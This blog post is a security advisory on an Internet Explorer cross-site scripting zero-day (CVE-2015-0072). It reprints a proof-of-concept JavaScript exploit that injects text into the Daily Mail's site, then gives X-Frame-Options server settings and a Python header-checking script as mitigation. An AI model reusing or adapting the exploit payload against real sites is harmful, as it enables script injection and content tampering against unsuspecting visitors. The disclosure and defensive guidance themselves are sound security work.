Friday, February 6, 2015

How to Protect Yourself From an IE Zero-day Vulnerability That is Threatening Your Website

A new, previously unknown cross-site scripting vulnerability in Microsoft Internet Explorer, which lets remote users bypass the same-origin policy and inject arbitrary JavaScript into HTML pages, was revealed yesterday by deusen.co.uk.

Researchers from deusen.co.uk published sample exploit code to demonstrate how to hack dailymail.co.uk — Great Britain’s leading online daily newspaper. A specially crafted link takes users to dailymail.co.uk, after which the message “Hacked by Deusen” is injected into the page.


Message on dailymail.co.uk website


The sample exploit code looks like this:

 function go()
 {
  w=window.frames[0];
  w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1);
 }
 setTimeout("go()",1000);

Both Internet Explorer 10.x and 11.x contain this flaw and are therefore exposed to this attack. You may find its detailed description at http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0072.

The experts at Positive Technologies point out that there are several similar exploit examples on the Web that demonstrate the threats this new vulnerability poses to many sites, including those used for critical resources.

For example, check out this simulated attack video, posted on the PHDays website.


How to Stop this Threat

You must prohibit third-party framing of your pages by having the web server send the X-Frame-Options header: SAMEORIGIN allows a page to be framed only by pages from the same origin, and DENY forbids framing altogether.

The Apache setting in .htaccess looks like this:

# requires mod_headers; "set" (rather than "append") guarantees the header is sent exactly once
Header always set X-Frame-Options "SAMEORIGIN"

For nginx:

add_header X-Frame-Options SAMEORIGIN;

For IIS:


If the X-Frame-Options setting is not possible in your environment, you would need to increase the security level of your web application firewall.


PT Application Firewall Security Settings
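Setting the header is only half the job: it must reach the browser exactly once and with a value browsers recognise, otherwise the page stays frameable as if nothing had been configured. The following checker is an added example (my code, not from the original post or from Positive Technologies). It assumes Python 3 with only the standard library; `evaluate_xfo` and `check_url` are names chosen here, and the header sets in `SAMPLE_RESPONSES` are constructed. A duplicated header, or a single header carrying a comma-separated list such as "SAMEORIGIN, SAMEORIGIN" (what an Apache `Header append` produces when the header is also set at another level), is flagged as a misconfiguration because browsers do not agree on how to treat duplicates.

```python
"""Check that a response's X-Frame-Options header is one a browser will honour.

Added example, not code from the original post or from Positive Technologies.
Standard library only. The header sets in SAMPLE_RESPONSES are constructed.
"""
import sys
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Values RFC 7034 defines; anything else is ignored by browsers, which leaves
# the page frameable exactly as if no header had been sent.
_SIMPLE_VALUES = {"DENY", "SAMEORIGIN"}


def evaluate_xfo(header_values):
    """Return (ok, reason) for the X-Frame-Options values one response carried.

    header_values is the list of values as they appeared on the wire, one
    entry per header line (an empty list means the header was absent).
    """
    lines = [v.strip() for v in header_values if v.strip()]
    if not lines:
        return False, "header missing: any origin may frame this page"

    # Several header lines, or one line carrying a comma-separated list
    # (what 'Header append' produces when the header is also set elsewhere),
    # are both duplicates. Browsers do not agree on how to treat duplicates,
    # so report a misconfiguration instead of guessing.
    parts = [p.strip() for line in lines for p in line.split(",")]
    if len(parts) > 1:
        return False, "header duplicated (%s): fix the server config so it is sent once" % ", ".join(parts)

    value = parts[0]
    upper = value.upper()
    if upper in _SIMPLE_VALUES:
        return True, "%s: framing restricted" % upper
    if upper.startswith("ALLOW-FROM"):
        origin = value[len("ALLOW-FROM"):].strip()
        if not origin:
            return False, "ALLOW-FROM without an origin: browsers ignore it"
        return True, "ALLOW-FROM %s: only that origin may frame the page (not every browser supports ALLOW-FROM)" % origin
    return False, "unrecognised value %r: browsers ignore it, page stays frameable" % value


def check_url(url, timeout=10):
    """Fetch url with GET (redirects followed) and evaluate its X-Frame-Options header.

    GET rather than HEAD, because some servers answer HEAD with fewer headers.
    """
    req = Request(url, headers={"User-Agent": "xfo-check/1.0"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            values = resp.headers.get_all("X-Frame-Options") or []
    except HTTPError as err:
        # Error pages must be protected too; their headers are still available.
        values = err.headers.get_all("X-Frame-Options") or []
    return evaluate_xfo(values)


# Constructed header sets standing in for real responses.
SAMPLE_RESPONSES = {
    "no header at all": [],
    "nginx add_header": ["SAMEORIGIN"],
    "lowercase deny": ["deny"],
    "Apache 'Header append' set at two levels": ["SAMEORIGIN, SAMEORIGIN"],
    "two header lines, conflicting": ["SAMEORIGIN", "DENY"],
    "non-standard value": ["ALLOWALL"],
    "ALLOW-FROM": ["ALLOW-FROM https://partner.example"],
}


def audit_samples():
    """Evaluate every constructed sample; returns {label: ok} for the caller."""
    results = {}
    for label, values in SAMPLE_RESPONSES.items():
        ok, reason = evaluate_xfo(values)
        results[label] = ok
        print("%-4s %-42s %s" % ("OK" if ok else "FAIL", label, reason))
    return results


if __name__ == "__main__":
    audit_samples()
    # Any URLs given on the command line are fetched and checked the same way.
    for url in sys.argv[1:]:
        ok, reason = check_url(url)
        print("%-4s %-42s %s" % ("OK" if ok else "FAIL", url, reason))
```

Run it with no arguments to see the verdict for each constructed sample, or pass your own site's URL to check the header it actually serves after the configuration change.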

It is worth mentioning that zero-day vulnerabilities in infrastructure components, such as Shellshock and GHOST, have lately been publicized more and more often. Google has also added fuel to the fire with its recent disclosure of Windows security flaws, despite Microsoft’s requests for more flexibility on the matter. It seems the mainstream approach “discover – help to fix – publish details” is no longer in play.
